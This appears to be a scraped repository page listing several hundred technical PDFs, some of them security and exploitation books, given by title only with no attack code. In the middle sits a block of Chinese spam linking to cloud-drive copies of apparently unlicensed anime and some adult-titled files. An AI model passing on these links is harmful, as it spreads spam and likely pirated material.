./Lockless Programming - GDC 2009 - Slides (Bruce Dawson).ppt
./A Tunable Compression Framework for Bitmap Indices (Guzun_ICDE_2014).pdf
./Data Structures and Algorithms (2008).pdf
./Windows Kernel Internals - Advance Virtual Memory.pdf
./Captain Hook - Pirating AVs to Bypass Exploit Mitigations - Slides (2016).pdf
./20050408-kickstart.pdf
./Practical File System Design - The Be Filesystem.pdf
./Data Compression Techniques - Lecture 4 - Integer Codes 2 - University of Helsinky - Slides (DCT2015-Lecture4).pdf
./DataMining-ch6.pdf
./The Elements of Statistical Learning - Data Mining, Inference and Prediction - 2nd Edition (ESLII_print4).pdf
./The Allure of Machine Learning - Azure ML.pdf
./Machine Learning - The High-Interest Credit Card of Technical Debt - Google (43146).pdf
./Array Layouts for Comparison-based Searching (March 14, 2017).pdf
./OpenVMS RTL String Manipulation (STR$) Manual - April 2006 (AA-PV6MD-TK).pdf
./ComputerHacking.pdf
./Benefits of IO Acceleration Technology in Clusters.pdf
./Relative Suffix Trees - 15th Dec, 2017 (1508.02550).pdf
./When Corrections Fail - The Persistence of Political Misperceptions (nyhan-reifler).pdf
./Improving Automated Analysis of Windows x64 Binaries - Uninformed v4a1 (April 2006).pdf
./Fast Packed String Matching for Short Patterns - 2012 (1209.6449).pdf
./Intel Pro-1000 PT Quad Port Bypass Server Adapter.pdf
./Automatic Self-Allocating Threads on an SGI Challenge (10.1.1.37.3403).pdf
./Foundations of Data Science.pdf
./Faster Population Counts using AVX2 Instructions (1611.07612v1).pdf
./Using Memory Management to Detect and Extract Illegitimate Code for Malware Analysis - Slides - 2012.pdf
./A Locality-Sensitive Hash for Real Vectors (10.1.1.215.7690).pdf
./High Performance Histograms on SIMT and SIMD Architectures - M.E.R. Berger, Master's Thesis (2015).pdf
./A Novel Hybrid Quicksort Algorithm Vectorized using AVX-512 on Intel Skylake - 2017 (Paper_44-A_Novel_Hybrid_Quicksort_Algorithm_Vectorized).pdf
./The Longest Common Extension Problem Revisited and Applications to Approximate String Searching (2010).pdf
./Penetration Testing A Survival Guide.pdf
./Windows 8 Registered IO (SAC-593T_Briggs).pptx
./MSDN - Multithreading Performance (January 31, 1996).pdf
./readme.bak
./Open Source Kernel Enhancements for Low-Latency Sockets using Busy Poll - Intel (Whitepaper).pdf
./Introduction to Machine Learning - CMU-10701 - Deep Learning - Slides (Spring 2014).pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1127.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1120.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1030.pdf
./云顶云ACP云计算方向模拟题/阿里云ACP云计算方向模拟题 171218.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1023.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1009.pdf
./云顶云ACP云计算方向模拟题/阿里云ACP云计算方向模拟题 171211.pdf
./云顶云ACP云计算方向模拟题/阿里云ACP云计算方向模拟题 171204.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1016.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1106.pdf
./云顶云ACP云计算方向模拟题/阿里云云计算专业认证考试(ACP)模拟题-1113.pdf
./NVML - Implementing Persistent Memory Applications - 2015.pdf
./Math for Machine Learning (2009).pdf
./Python 2.1 Bible.pdf
./Intel Xeon Phi Coprocessor Datasheet (April 2014).pdf
./LinuxCon 2009 - 10Gbs Bi-directional Routing.pdf
./Solaris Internals - Core Kernel Architecture.pdf
./Numba - Python Compiler for NumPy-SciPy.pdf
./Tries and String Matching - Slides - 2009 (Small09).pdf
./Inside the Python GIL - Dave Beazley (2009).pdf
./Programming with the x87 Floating Point Unit - Intel.pdf
./A comprehensive study of Convergent and Commutative Replicated Data Types.pdf
./NVDIMM Block Window Driver Writer's Guide - Intel (April 2015).pdf
./20050117-jianfei.pdf
./Retrofitting Word Vectors to Semantic Lexicons - 2015 (15HLT-retrofitting-word-vectors).pdf
./Out of the Tar Pit (2006).pdf
./java_json反序列化之殇_看雪安全开发者峰会.pdf
./Temporally Bounding TSO for Fence-Free Asymmetric Synchronization - 2015 (asplos2015-tbtso).pdf
./Track Join - Distributed Joins with Minimal Network Traffic (sigmod14II).pdf
./XMLDTDEntityAttacks.pdf
./DeepState - Symbolic Unit Testing for C and C++ - 2018 (bar18).pdf
./SIMD Parallelization of Applications that Traverse Irregular Data Structures.pdf
./20050420-makelinux.pdf
./Fast Scalable Construction of (Minimal Perfect Hash) Functions - 22 Mar 2016, v2 (1603.04330).pdf
./DataMining-ch4.pdf
./Perfect Hash Families in Polynomial Time - Slides - October 2010 (552phf).pdf
./Exact Minimum Degree Thresholds for Perfect Matchings in Uniform Hypergraphs (2012).pdf
./Windows 8 Registered IO (SAC-593T_Briggs).pdf
./PCI Express Basics.pdf
./Loop Independence, Compiler Vectorization and Threading of Loops (SSE and AVX) - Intel - Slides.pdf
./20060726-openldap-postfix.pdf
./Colfax - Programming and Optimization for Intel Architecture (2016).pdf
./Staring Into The Abyss - An Evaluation of Concurrency Control with One Thousand Cores (p209-yu).pdf
./The UVM Virtual Memory System (1999).pdf
./Next Generation Collaborative Reversing with Ida Pro and CollabREate - 2008 (BH_US_08_Eagle_Vidas_Collabreate_paper).pdf
./20051012-suse-linux_history.pdf
./Bit Operations (Ray Seyfarth 2011).pdf
./Bypass Control Flow Guard Comprehensively - Slides (2015).pdf
./Microsoft Windows RPC Security Vulnerabilities.pdf
./Adaptive String Dictionary Compression in In-Memory Column-Store Database Systems (2014).pdf
./Improved Fast Similarity Search in Dictionaries - 2010 (1008.1191v2).pdf
./Cache Aware Bi-tier Task-stealing in Multi-socket Multi-core Architecture (icpp11).pdf
./Near-Optimal Space Perfect Hashing Algorithms - PhD Thesis (2008).pdf
./Battle of SKM and IUM - How Windows 10 Rewrites OS Architecture - Alex Ionescu - 2015 (blackhat2015).pdf
./AMD64 Architecture Programmer's Manual - Volume 5 - 64-Bit Media and x87 Floating-point Instructions (26569, r3.12, Mar-2012).pdf
./ACC626 Social Engineering A Cheung.pdf
./Programming Python 4th Edition.pdf
./RTFM - Red Team Field Manual v3.pdf
./Hardware-Aware Optimization- Using Intel Streaming SIMD Extensions - Slides (2010).pdf
./Paper - Fractal Prefetching B-Trees.pdf
./SQLGraph - An Efficient Relational-Based Property Graph Store - 2015 (43287).pdf
./BlueBorne Technical White Paper-1.pdf
./DataMining-ch5.pdf
./Ownership and Reference Counting based Garbage Collection in the Actor World - Ponylang (2015).pdf
./Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf
./Managing the Google T1-5 Relational Database (10.1.1.456.9390).pdf
./Understanding Open Market Operations.pdf
./POSH - Python Object Sharing.pdf
./Self-Verifying Execution (Position Paper) - Microsoft Research (2016).pdf
./Reducing the Space Requirement of Suffix Trees (Kurtz_SWPracticeandExperiment_1999).pdf
./The Need for Asynchronous, Zero-Copy Network IO - Drepper (Slides).pdf
./Modeling High-Frequency Limit Order Book Dynamics with Support Vector Machines.pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Volume 2A - Instruction Set Reference, A-L - June 2016 (253666-059US).pdf
./全景图20190114.pdf
./Know Your HTTP Status Codes.pdf
./Affinity Accept - Improving Network Connection Locality on Multicore Systems.pdf
./Windows Persistent Memory Support (20160811_S301B_Christiansen).pdf
./Reflective DLL Injection v1.0 - Stephen Fewer (31st October 2008).pdf
./Topic Indexing - Slides.pdf
./A Comparison of Software and Hardware Techniques for x86 Virtualization - Oct 2015 (asplos235_adams).pdf
./HyperLogLog - The Analysis of a Near-Optimal Cardinality Estimation Algorithm (914-3045-2-PB).pdf
./Compression - Slides.pdf
./Intel 64 and IA-32 Architectures Optimization Reference Manual - June 2016 (248966-033).pdf
./Oracle Row Pattern Matching in Sequences of Rows.pdf
./Advanced Data Structures - MIT 6.851 (2012).pdf
./Graph Theoretic Obstacles to Perfect Hashing - 1994 (TR0257).pdf
./STOPLESS - A Real-Time Garbage Collector for Multiprocessors (10.1.1.108.322).pdf
./Art Of Intel x86 Assembly.pdf
./Branch and Data Herding - Reducing Control and Memory Divergence for Error-tolerant GPU Applications (tmm12_preprint).pdf
./How the VAX Lost Its POLY (and EMOD and ACB_floating too) (vax_poly).pdf
./Strongly Universal String Hashing is Fast - 15 May 2014 (1202.4961).pdf
./A Look at Intel's Dataplane Development Kit (2014).pdf
./Oracle 11 Data Warehousing Guide (e25554).pdf
./Reversing Secrets of Reverse Engineering.pdf
./Security Engineering - Ross Anderson (v1).pdf
./HackYourFriend.pdf
./Explaining AdaBoost.pdf
./Black Hat Python Python Programming for Hackers and Pentesters.pdf
./Patterns Of Software - Tales from the Software Community.pdf
./On the Construction and Application of Compressed Text Indexes (2004).pdf
./NYSE OpenBook Ultra Spec v1.9.pdf
./The Evolution of Effective B-tree Page Organization and Techniques - A Personal Account - David Lomer, Microsoft Research (a1-lomet).pdf
./Fast Prefix Search in Little Space, with Applications.pdf
./Agner Fog - Instruction Tables (2013-04-03).pdf
./Anti-Debugging Reference - Peter Ferrie (4 May 2011).pdf
./Elevated - Function 2009.pdf
./MIPSpro C and C++ Pragmas (007-3587-005).pdf
./20071031-mkcdrec.pdf
./The Debugging Application Programming Interface - MSDN (1992).pdf
./Vim for Humans.pdf
./upMd.sh
./Exploiting Coarse-Grain Speculative Parallelism.pdf
./HAT-trie - A Cache-conscious Trie-based Data Structure for Strings - 2007 (CRPITV62Askitis).pdf
./Effective Computation of Biased Quantiles over Data Streams (bquant).pdf
./Lecture Notes on Linear Algebra (2015).pdf
./Git Magic.pdf
./20070214-xen_on_sles_10.pdf
./MSDN - DLLs the Dynamic Way (November, 1999).pdf
./Foundations of Databases.pdf
./Analysis of GS protections in Microsoft Windows Vistal - Symantec.pdf
./Pandas v0.14.1.pdf
./MonetDB-X100 - Hyper-Pipelining Query Execution (CIDR 2005 P19).pdf
./Getting Physical - Extreme Abuse of Intel-based Paging Systems - Slides - 2016 (CSW2016_Economou-Nissim_GettingPhysical).pdf
./20060911-proxy-auth.pdf
./Paper - Interleaving.pdf
./**信息安全从业人员现状调查报告2017.pdf
./Eliminating Global Interpreter Locks in Ruby through Hardware Transactional Memory (PPoPP2014_RubyGILHTM).pdf
./Finance - Salomon Smith Barney Introductory Guide to Equity Options (1998).pdf
./Compressed Perfect Embedded Skip Lists for Quick Inverted-Index Lookups.pdf
./Data Compression Techniques - Lecture 7 - Dictionary Compression (DCT2015-Lecture7Web).pdf
./SPARC - v9 Architecture Manual.pdf
./Vectorized Bloom Filters for Advanced SIMD Processors - Columbia - Slides.pdf
./RadixVM - (Slides) Scalable address spaces for multithreaded applications.pdf
./Oracle 11gr2 Performance Tuning Guide (e41573).pdf
./BigQuery Technical Whitepaper - Google.pdf
./Versioned external-memory dictionaries with optimal query-update tradeoffs - 2011 (1103.2566v2).pdf
./100G Networking Technology Overview - Slides - Toronto (August 2016).pdf
./Dapper - A Large-Scale Distributed Systems Tracing Infrastructure (36356).pdf
./Learning with Hypergraphs - Clustering, Classification, and Embedding (2017).pdf
./Intel Architecture Code Analyzer - User's Guide - v3.0 (2017).pdf
./DataMining-ch1.pdf
./Fractal Prefetching B+ Trees - Optimizing Both Cache and Disk Performance.pdf
./Unary Coding for Neural Network Learning (1009.4495).pdf
./AMD64 Architecture Programmer's Manual - Volume 5 - 64-Bit Media and x87 Floating-point Instructions (26569, r3.13, May-2013).pdf
./Balanced Families of Perfect Hash Functions and Their Applications - 2007.pdf
./20051205-use_mysql_in_apache_passwd.pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Combined Volumes 1-4 - May 2018 (325462-sdm-vol-1-2abcd-3abcd).pdf
./SEDA - An Architecture for Well-Conditioned, Scalable Internet Services - Dissertation (mdw-phdthesis).pdf
./Introduction to Debugging the FreeBSD Kernel - Paper - BSDCan 2008.pdf
./Marshaller_Deserialization_Attacks.pdf.pdf
./ELF Handling for Thread-Local Storage - Ulrich Drepper (2005).pdf
./Software Transactional Memory - Why Is It Only a Research Toy (p46-cascaval).pdf
./20080703-Apache22_Tomcat60_MySQL50_mod_jk.pdf
./Vulcan - Binary Transformation in a Distributed Environment (tr-2001-50).pdf
./Real World Concurrency.pdf
./Optimizing Indirect Memory References with milk - 2016 (p299-kiriansky).pdf
./Intel Xeon Scalable Processor - Throughput Latency.pdf
./Hacking Exposed.pdf
./Architectural Support for SWAR Text Processing with Parallel Bit Streams - The Inductive Doubling Principle - 2009 (p337-cameron).pdf
./Fast Sorted-Set Intersection using SIMD Instructions (p1-SCHLEGEL).pdf
./xv6 - a simple, Unix-like teaching operating system (Aug 28 2012, draft 7).pdf
./The Tagled Web A Guide to Securing Modern Web Applications.pdf
./Data Compression Techniques - Lecture 1 - Shannon's Theorem - University of Helsinky - Slides (2015).pdf
./Threads and DragonFlyBSD - Slides - 2009 (luciani_dcbsdcon2009).pdf
./Lossless Source Coding (03_Lossless-Coding-WS12).pdf
./Safe Memory Reclamation for Dynamic Lock-Free Objects Using Atomic Reads and Writes - 2002 (podc-2002).pdf
./Proofs and Refutations (1963).pdf
./Dangerours+Google+Hacking+Database+and+Attacks.zip
./Asynchronous Teams - Cooperation Schemes for Autonomous Agents.pdf
./Hypergraphs - Algorithms, Implementations, and Applications - Poster (2015).pdf
./Anatomy of High-Performance Matrix Multiplication - 2008 (gotoPaper).pdf
./Avoiding AVX to SSE Transition Penalties.pdf
./RadixVM - Scalable address spaces for multithreaded applications.pdf
./Efficient Lightweight Compression Algorithm Alongside Fast Scans (damon15).pdf
./Intel Architecture Instruction Set Extensions Programming Reference - Feb 2016 (319433-024).pdf
./Allocation Removal by Partial Evaluation in a Tracing JIT - 2010 (bolz-allocation-removal).pdf
./Structured Exception Handler Exploitation (17505).pdf
./Calculus Made Easy.pdf
./Experiences Porting Real Time Signal Processing Pipeline CUDA Kernels to Kepler and Windows 8 - Slides - 2014 (S4148-rt-signal-processing-pipeline-cuda-kernels-kepler-win8).pdf
./Kernel Pool Exploitation on Windows 7 (BlackHat_DC_2011_Mandt_kernelpool-wp).pdf
./Estoteric Hooks - Alex Ionescu - Slides (2015).pdf
./SEDA - An Architecture for Well-Conditioned, Scalable Internet Services (seda-sosp01).pdf
./The UNIX Time-Sharing System (1974).pdf
./The Slow Winter.pdf
./Free Launch - Optimizing GPU Dynamic Kernel Launches through Thread Reuse (2015).pdf
./Colfax Optimization Techniques for the Intel MIC Architecture - Part 1 of 3 - Multi-threading and Parallel Reduction (2015).pdf
./Linux安全加固.pdf
./Memory Barriers - a Hardware View for Software Hackers (July 23, 2010).pdf
./Hyperedge Replacement Graph Grammars.pdf
./Proof of Concept or GTFO - v13 (October 18th, 2016).pdf
./AMD64 Architecture Programmer's Manual - Volume 2 - System Programming (24593, r3.24, Oct-2013).pdf
./Compressed Inverted Indexes - Slides (2010).pdf
./Dynamic Storage Allocation - Survey and Critical Review.pdf
./CUDA Threads - GPU Architecture and Programming - NYU CSCI-GA.3033-012 (2012).pdf
./Compiler Construction - Niklaus Wirth - 1996 (CBEAll).pdf
./Algorithms for Random 3-SAT.pdf
./These Are Not Your Grand Daddys CPU Performance Counters - CPU Hardware Performance Counters For Security - Slides (2015).pdf
./VAX-VMS Internals 2 Student Workbook (Oct-86, EY-2280E-SG-0001).pdf
./An Introduction to Computational Networks and the Computational Network Toolkit - Microsoft (CNTKBook-20160121).pdf
./Rainbow matchings in r-partite r-graphs - 2009 (v16i1r119).pdf
./ExploitingBlueBorneLinuxBasedIoTDevices.pdf
./Reverse Engineering Malicious Code Tips.pdf
./Gunrock - A Fast and Programmable Multi-GPU Graph Processing Library - Slides - 2015 (SC5139).pdf
./Basic Linear Algebra Subprograms for Fortran Usage - BLAS (1979).pdf
./Windows - A Software Engineering Odyssey (Lucovsky).ppt
./k-Ary Search on Modern Processors.pdf
./Understanding Deep Learning Requires Rethinking Generalization - 2016 (1611.03530v1).pdf
./Mison - A Fast JSON Parser for Data Analytics (p1118-li).pdf
./Making Lockless Synchronization Fast - Performance Implications of Memory Reclamation (hart_ipdps06).pdf
./An In-Depth Analysis of Disassembly on Full-Scale x86-x64 Binaries - 2016 (sec16_paper_andriesse).pdf
./Practical R (2013).pdf
./CUDA Asynchronous Memory Usage and Execution (cuda_05_ykhung).pdf
./Linux 操作系统 – Shell 高级篇.pdf
./Rich vs King - The Entrepreneur's Dilemma - Harvard (2006).pdf
./Empirical Study of the Anatomy of Modern SAT Solvers (2010).pdf
./Gray Hat Hacking The Ethical Hackers Handbook 3rd edition.pdf
./JavaScript Cheat Sheet.pdf
./Extending Python for High-performance Data-Parallel Programming (March 24, 2014).pdf
./Multiple Byte Processing with Full-Word Instructions - Leslie Lamport (1975).pdf
./Linux - FS Workshop.pdf
./On the Performance of Bitmap Indices for High Cardinality Attributes - 2004 (RS1P2).PDF
./Bug Hunter Diary.pdf
./20050606-suse_linux_server_9_install.pdf
./QuickThread - Superscalar Programming 101 - Parts 1-5 (2009).pdf
./Semantic Patches - Documenting and Automating Collateral Evolutions in Linux Device Drivers (ols07-padioleau).pdf
./Demystifying DAS, SAN, NAS, NAS Gateways, Fibre Channel, and iSCSI.pdf
./Intel 64 and IA-32 Architectures Optimization Reference Manual - Sept 2014 (248966-030).pdf
./9781782168492-KALI_LINUX_2_WINDOWS_PENETRATION_TESTING.pdf
./WinDbg - A to Z (Slides).pdf
./General Analysis of Maxima and Minima in Constrained Optimization Problems.pdf
./DataMining-ch2.pdf
./Programming with Hardware Lock Elision.pdf
./kk.txt
./Vim Book (vimbook-OPL).pdf
./Guide to Automatic Vectorization with Intel AVX-512 Instructions in Knights Landing Processors - Bonan Zhang - Colfax International, 2016 (Colfax_KNL_AVX512_Guide).pdf
./Windows Filter Manager - Slides (2003).ppt
./AMD64 Architecture Programmer's Manual - Volume 4 - 128-Bit and 256-Bit Media Instructions (26568, r3.18, Oct-2013).pdf
./Oracle 11g - Advanced Compression Whitepaper (Jan 2012).pdf
./Cognitive Biases Potentially Affecting Judgment of Global Risks (2008).pdf
./9781783554638-WIRESHARK_ESSENTIALS.pdf
./Rethinking SIMD Vectorization for In-Memory Databases (2015).pdf
./It's Time for Low Latency (latency_hotos11).pdf
./Further Scramblings of Marsaglia's Xorshift Generators - 23 May 2016 (1404.0390).pdf
./Probability and Statistics Cookbook.pdf
./FAST - Fast Architecture Sensitive Tree Search on Modern CPUs and GPUs - Slides.pdf
./Optimizing Pattern Matching.pdf
./Bitmap Indices for Data Warehouses.pdf
./20060911-proxy-basic.pdf
./SIMD Vectorization of Histogram Functions (10.1.1.80.9041).pdf
./Parallel Programming with Transactional Memory (p38-drepper).pdf
./AMD - CPUID.pdf
./Heracles- Improving Resource Efficiency at Scale (2015.heracles.isca).pdf
./DataMining-ch3.pdf
./20041202-firefox.pdf
./Generating Text with Recurrent Neural Networks (LANG-RNN).pdf
./A Scalable Lock-free Stack Algorithm (2004).pdf
./Compiler Design - Theory, Tools and Examples.pdf
./Fundamentals of Calculs - Crowell et al - 2016.pdf
./Paper - Wegner Transactive Memory.pdf
./iSAX 2.0 - Indexing and Mining One Billion Time Series.pdf
./Bumper Sticker Computer Science.pdf
./Realizing Quality Improvement Through Test Driven Development - Results and Experiences of Four Industrial Teams (nagappan_tdd).pdf
./A Brief Tutorial on Database Queries, Data Mining, and OLAP (hamel-197-manuscript-final).pdf
./Faliure-Atomic msync() - A Simple and Efficient Mechanism for Preserving the Integrity of Durable Data.pdf
./How to Write Fast Code - SIMD Vectorization - CMU - 2008 - Slides (slides-18-645-simd).pdf
./Probabilistic Graph and Hypergraph Matching (2008).pdf
./Hacking For Dummies 3rd Edition.pdf
./BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf
./Distributed Component Object Model (DCOM) Remote Protocol - MS-DCOM-2015 (October 16th, 2015).pdf
./Intel SIMD Architecture - Yung-Yu - UCONN (2007).pdf
./20050712-SLES-DNS.pdf
./asd-f03-serial-killer-silently-pwning-your-java-endpoints.pdf
./Generalized Golomb Codes and Adaptive Coding of Wavelet-Transformed Image Subbands (August 15th, 2003).pdf
./Filter Manager - Windows.ppt
./Software Engineering Code of Ethics.pdf
./Haswell Block Diagram.pdf
./Tru64 - Calling Standard (ARH9MCTE).PDF
./Mixed Model Universal Software Thread-Level Speculation (ICCP2013).pdf
./Windows Research Kernel - Design Notes (David Cutler et al, 1989).pdf
./Finding Small Balanced Separators (2006).pdf
./An Overview of Linux Kernel Locking Improvements (August 2014).pdf
./Concurrent Programming for Scalable Web Architectures - Benjamin Erb - Thesis (April 2012) (vts_8082_11772).pdf
./20051106-security.pdf
./Blackout - What Really Happened - Slides (2007).pdf
./Paper - The Need for Asynchronous, Zero-Copy Network IO.pdf
./The Continuous Linked Settlement (CLS) Foreign Exchange Settlement System.pdf
./Choosing a Good Chart (A. Abela, 2006).pdf
./TCSP培训 WAF.pdf
./Perfect Hashing for Data Management Applications - 2007 (0702159).pdf
./Trace-based Just-in-Time Type Specialization for Dynamic Languages - 2009 (tracemonkey).pdf
./Understanding the Basis of the Kalman Filter Via a Simple and Intuitive Derivation (2012).pdf
./Dodd-Frank Act Stress Test 2014 - Supervisory Stress Test Methodology and Results - March 2014 (bcreg20140320a1).pdf
OWASP/OWASP Top 10 2017 4e2d65877248v1.0-2.pdf
OWASP/OWASP Top 10 2017 中文版v1.0.pdf
OWASP/OWASP_Top_10-2017_(en).pdf
OWASP/OWASP测试指南v3.0.pdf
OWASP/OWASP 安全编码规范 快速参考指南.pdf
OWASP/OWASP Top 10-2017 (en).pptx
NIST_800/Cybersecurity-Framework-for-FCSM-Jan-2016.pdf
NIST_800/sp800-53.pdf
NIST_800/SP800-53A-final-sz.pdf
NIST_800/sp800-37-rev1-final.pdf
NIST_800/nist.sp.800-53ar4(Assessing Security and Privacy Controls in Federal Information Systems and Organizations).pdf
NIST_800/rmf2.0-webcast.pdf
NIST_800/nistspecialpublication800-70r2.pdf
NIST_800/nistspecialpublication800-53ar1.pdf
NIST_800/sp800-53-rev4-ipd_Security and Privacy Controls for Federal Information Systems and Organizations.pdf

Top 动漫

0、神墓 https://pan.quark.cn/s/3f78fc708558
1、仙逆 https://pan.quark.cn/s/ae5afde0054f
2、W - 完美世界 https://pan.quark.cn/s/7e2f0b19ca42
3、D斗破苍穹 年番 https://pan.quark.cn/s/59114a6a701b
4、F凡人修仙传 https://pan.quark.cn/s/e88506e5edeb
5、Z - 诛|仙 https://pan.quark.cn/s/52b2a303089c

其他资源

肉 pt https://pan.quark.cn/s/1d74f2b8676e
爱的那点性事 https://pan.quark.cn/s/67efd65e9f0f
T 吞噬星空 https://pan.quark.cn/s/211949941b85
B冰火魔厨第2季 https://pan.quark.cn/s/c8a8c2e7fc60

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.